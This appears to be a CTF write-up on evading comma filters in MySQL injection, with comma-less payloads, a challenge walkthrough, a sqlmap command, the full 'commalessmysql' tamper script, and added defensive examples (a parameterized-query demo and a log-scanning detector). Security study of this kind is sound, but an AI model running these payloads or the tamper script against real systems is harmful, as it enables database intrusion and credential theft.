Recently I worked through some CTF challenges and noticed that the SQL ones like to filter the comma ",", so I am taking the opportunity to write up a summary. I also have an idea: by writing a sqlmap tamper script, most of the SQL injection challenges of this kind could be solved in one go.
Blind injection normally relies on substr(), mid() and limit, and all of these take a comma. For substr() and mid(), the FROM ... FOR form avoids it:
select substr(database() from 1 for 1);
select mid(database() from 1 for 1);
Using join:
union select 1,2 # equivalent to
union select * from (select 1)a join (select 2)b
Using like:
select ascii(mid(user(),1,1))=80 # equivalent to
select user() like 'r%'
For limit, use offset:
select * from news limit 0,1
# equivalent to the following SQL statement
select * from news limit 1 offset 0
select * from table1 where id =1 and exists (select * from table2 where ord(substring(username from 1 for 1))=97);
127' UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e)#
select case when substring((select password from mysql.user where user='root') from 1 for 1)='e' then sleep(5) else 0 end #
substring((select password from mysql.user where user='root') from -1)='e'
Source: https://blog.csdn.net/nzjdsds/article/details/81322529
Example 1: iChunqiu Baidu Cup, September round, SQLI
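To see what these comma-less equivalents mean for a defender, here is an added example (my own, not from the original post) that builds a small SQLite database in memory and runs the post's JOIN-of-subselects and LIKE forms against a lookup protected only by a comma blocklist, then against the same lookup with a bound parameter. The schema, rows and payload strings are constructed for this example; SQLite is used because it ships with Python and accepts the JOIN and LIKE forms unchanged (it does not accept the FROM ... FOR syntax, so that one is left out).

```python
import sqlite3


# Constructed sample schema: a 'news' table the page reads from and a 'users'
# table holding secrets. Names and rows are invented for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    conn.execute("INSERT INTO news VALUES (1, 'hello')")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'secret')")
    return conn


def comma_filter_passes(value):
    """The challenge-style defence: refuse any input containing a comma."""
    return "," not in value


def vulnerable_query(conn, user_id):
    """String concatenation guarded only by the comma filter. Returns None when
    the filter blocks the input, otherwise whatever rows the resulting SQL gives."""
    if not comma_filter_passes(user_id):
        return None
    sql = "SELECT id, title FROM news WHERE id = '{}'".format(user_id)
    return conn.execute(sql).fetchall()


def parameterized_query(conn, user_id):
    """Same lookup with a bound parameter: the input is data, never SQL text,
    so no character blocklist is needed and none of the comma-less rewrites matter."""
    return conn.execute("SELECT id, title FROM news WHERE id = ?", (user_id,)).fetchall()


# The page's comma-less primitives as they would arrive in the id parameter.
# JOIN of sub-selects stands in for "UNION SELECT a, b";
# LIKE stands in for ascii(mid(x,1,1))=N in a boolean-blind probe.
UNION_JOIN = "0' UNION SELECT * FROM (SELECT username FROM users) a JOIN (SELECT password FROM users) b -- "
LIKE_TRUE = "1' AND (SELECT password FROM users) LIKE 's%' -- "
LIKE_FALSE = "1' AND (SELECT password FROM users) LIKE 'x%' -- "


def demo():
    conn = make_db()
    return {
        # the only thing the blocklist actually stops
        "filter_blocks_comma": vulnerable_query(conn, "1' UNION SELECT 1,2 -- "),
        "vuln_union_join": vulnerable_query(conn, UNION_JOIN),
        "vuln_like_true": vulnerable_query(conn, LIKE_TRUE),
        "vuln_like_false": vulnerable_query(conn, LIKE_FALSE),
        "param_union_join": parameterized_query(conn, UNION_JOIN),
        "param_normal": parameterized_query(conn, "1"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The blocklist rejects exactly one of the five inputs; the two comma-less payloads go straight through and read the users table or leak one character of it per request. The parameterized version needs no character list at all, because the id value never reaches the SQL parser as SQL.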
https://www.ichunqiu.com/battalion?t=1&r=54791
The page source hints at login.php, but that is a decoy link; the real one, l0gin.php, is in the response header.
http://81abba4bbfd54553ab84f1969f4479dc0e3ad323bdca49b0.changame.ichunqiu.com/l0gin.php?id=1'
Fuzz the parameter here to see which characters are filtered.
References: https://segmentfault.com/a/1190000018748071
https://www.4hou.com/vulnerable/6933.html
This was my first time using fuzzing, so I was not very proficient; I will gradually add my own statements to the test list to improve efficiency. What follows is a rough explanation.
The two response lengths should differ by 1 here, but they differ by 9. Opening the response shows that everything after that point was cut off, so the comma must be filtered.
Here we use this statement:
127' UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e)#
http://53574d90404b480e84e9c1d271100ceeb27c702c456643d4.game.ichunqiu.com/l0gin.php?id=1' union select * from (select database()) a join (select version() ) b %23
The page renders normally, so the injection actually worked, but only the first row is shown: in a UNION query, if the first SELECT returns a row, that is the row the page displays. Change the 1 to a value that does not exist.
Query the table names
Query the column names
But here only id appears; the other columns exist but there is no room to display them. We cannot use concat because we do not know the other column names and so cannot join them, and concat_ws cannot be used because it takes a comma and the filter breaks it, so I use group_concat() directly to join all the column names into one string, which needs no comma.
Reference: http://www.reibang.com/p/5d34b3722128
Using a sqlmap tamper to get around the comma filter
python sqlmap.py -u "http://81abba4bbfd54553ab84f1969f4479dc0e3ad323bdca49b0.changame.ichunqiu.com/l0gin.php?id=1" -p id --level 3 --risk 3 --tamper=commalessmysql -v3 -D sqli -T users --columns
commalessmysql.py
#!/usr/bin/env python
"""
Written by Ovie 2016-12-05
"""
import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST


def dependencies():
    pass


def tamper(payload, **kwargs):
    """
    Replaces some instances with something without a comma

    Requirement:
        * MySQL

    Tested against:
        * MySQL 5.0

    >>> tamper('ISNULL(TIMESTAMPADD(MINUTE,7061,NULL))')
    'ISNULL(NULL)'
    >>> tamper('MID(VERSION(), 2, 1)')
    'MID(VERSION() FROM 2 FOR 1)'
    >>> tamper('IF(26=26,0,5)')
    'CASE WHEN 26=26 THEN 0 ELSE 5 END'
    >>> tamper('IFNULL(NULL,0x20)')
    'CASE WHEN NULL IS NULL THEN 0x20 ELSE NULL END'
    >>> tamper('LIMIT 2, 3')
    'LIMIT 3 OFFSET 2'
    """

    def commalessif(payload):
        # Rewrite IF(cond, a, b) as CASE WHEN cond THEN a ELSE b END.
        # Parenthesis depth is tracked so commas inside nested calls are skipped.
        if payload and payload.find("IF") > -1:
            while payload.find("IF(") > -1:
                index = payload.find("IF(")
                depth = 1
                comma1, comma2, end = None, None, None
                for i in range(index + len("IF("), len(payload)):
                    if depth == 1 and payload[i] == ',' and not comma1:
                        comma1 = i
                    elif depth == 1 and payload[i] == ',' and comma1:
                        comma2 = i
                    elif depth == 1 and payload[i] == ')':
                        end = i
                        break
                    elif payload[i] == '(':
                        depth += 1
                    elif payload[i] == ')':
                        depth -= 1
                if comma1 and comma2 and end:
                    _ = payload[index + len("IF("):comma1]
                    __ = payload[comma1 + 1:comma2]
                    ___ = payload[comma2 + 1:end]
                    newVal = "CASE WHEN %s THEN %s ELSE %s END" % (_, __, ___)
                    payload = payload[:index] + newVal + payload[end + 1:]
                else:
                    break
        return payload

    def commalessifnull(payload):
        # Rewrite IFNULL(a, b) as CASE WHEN a IS NULL THEN b ELSE a END.
        # (The original used "a=NULL", which is never true in SQL and so always
        # returned a; IS NULL preserves IFNULL's meaning.)
        if payload and payload.find("IFNULL") > -1:
            while payload.find("IFNULL(") > -1:
                index = payload.find("IFNULL(")
                depth = 1
                comma, end = None, None
                for i in range(index + len("IFNULL("), len(payload)):
                    if depth == 1 and payload[i] == ',':
                        comma = i
                    elif depth == 1 and payload[i] == ')':
                        end = i
                        break
                    elif payload[i] == '(':
                        depth += 1
                    elif payload[i] == ')':
                        depth -= 1
                if comma and end:
                    _ = payload[index + len("IFNULL("):comma]
                    __ = payload[comma + 1:end].lstrip()
                    newVal = "CASE WHEN %s IS NULL THEN %s ELSE %s END" % (_, __, _)
                    payload = payload[:index] + newVal + payload[end + 1:]
                else:
                    break
        return payload

    retVal = payload

    if payload:
        # TIMESTAMPADD(unit, n, NULL) is always NULL, so drop the call entirely
        retVal = re.sub(r'(?i)TIMESTAMPADD\(\w+,\d+,NULL\)', 'NULL', retVal)
        # MID(x, a, b) -> MID(x FROM a FOR b)
        retVal = re.sub(r'(?i)MID\((.+?)\s*,\s*(\d+)\s*\,\s*(\d+)\s*\)', r'MID(\g<1> FROM \g<2> FOR \g<3>)', retVal)
        retVal = commalessif(retVal)
        retVal = commalessifnull(retVal)
        # LIMIT a, b -> LIMIT b OFFSET a
        retVal = re.sub(r'(?i)LIMIT\s*(\d+),\s*(\d+)', r'LIMIT \g<2> OFFSET \g<1>', retVal)

    return retVal
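Since the tamper above makes these rewrites automatic, a WAF rule or log review that only looks for commas misses the whole class. The following added example (my own, not part of the write-up or of sqlmap) scans constructed access-log request lines for the comma-less forms the tamper emits and the write-up uses by hand: MID/SUBSTRING ... FROM ... FOR, JOIN (SELECT, LIMIT n OFFSET m, CASE WHEN, LIKE prefix probes and SLEEP(). The rule names, the log lines and the normalization step are all assumptions for this example.

```python
import re
from urllib.parse import unquote_plus

# Loose signatures for the comma-less rewrites; tune them against your own traffic.
RULES = {
    "substring-from-for": re.compile(r"\b(?:MID|SUBSTR(?:ING)?)\s*\(.*?\bFROM\b.*?\bFOR\b", re.I),
    "join-subselect": re.compile(r"\bJOIN\s*\(\s*SELECT\b", re.I),
    "limit-offset": re.compile(r"\bLIMIT\s+\d+\s+OFFSET\s+\d+", re.I),
    "case-when": re.compile(r"\bCASE\s+WHEN\b.*?\bTHEN\b", re.I),
    "like-probe": re.compile(r"\bLIKE\s*'[^']*%'", re.I),
    "timing": re.compile(r"\bSLEEP\s*\(", re.I),
}


def normalize(request_line):
    """Decode %XX and '+' once and strip inline comments so that
    'union/**/select' style spacing does not hide the keywords."""
    decoded = unquote_plus(request_line)
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded)


def scan_request(request_line):
    """Return the sorted list of rule names that fire on one request line."""
    text = normalize(request_line)
    return sorted(name for name, rx in RULES.items() if rx.search(text))


def scan_log(lines):
    """Return (line_index, hits) for every line that triggers at least one rule."""
    results = []
    for i, line in enumerate(lines):
        hits = scan_request(line)
        if hits:
            results.append((i, hits))
    return results


# Constructed access-log request lines (hostnames and paths invented for this example).
SAMPLE_LOG = [
    "GET /l0gin.php?id=1 HTTP/1.1",
    "GET /l0gin.php?id=1'%20union%20select%20*%20from%20(select%20database())%20a%20join%20(select%20version())%20b%20%23 HTTP/1.1",
    "GET /l0gin.php?id=1'+and+mid(version()+from+1+for+1)='5'%23 HTTP/1.1",
    "GET /l0gin.php?id=1'+and+case+when+(select+user())+like+'r%25'+then+sleep(5)+else+0+end%23 HTTP/1.1",
    "GET /news.php?page=2&id=1+limit+1+offset+0 HTTP/1.1",
    "GET /search.php?q=looking+for+a+mid-range+phone HTTP/1.1",  # benign: no call syntax
]

if __name__ == "__main__":
    for idx, hits in scan_log(SAMPLE_LOG):
        print(idx, hits, SAMPLE_LOG[idx])
```

The last sample line shows why the substring rule insists on an opening parenthesis: plain English containing "for" and "mid" must not fire. A LIKE probe or a single CASE WHEN is weak evidence on its own, so in practice score these per source IP and alert on repeated hits or on any line that combines a probe with SLEEP().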
References:
http://www.reibang.com/p/5d34b3722128
https://www.jishuwen.com/d/2GA5
https://www.jishuwen.com/d/2c3j
https://www.cnblogs.com/Vinson404/p/7253255.html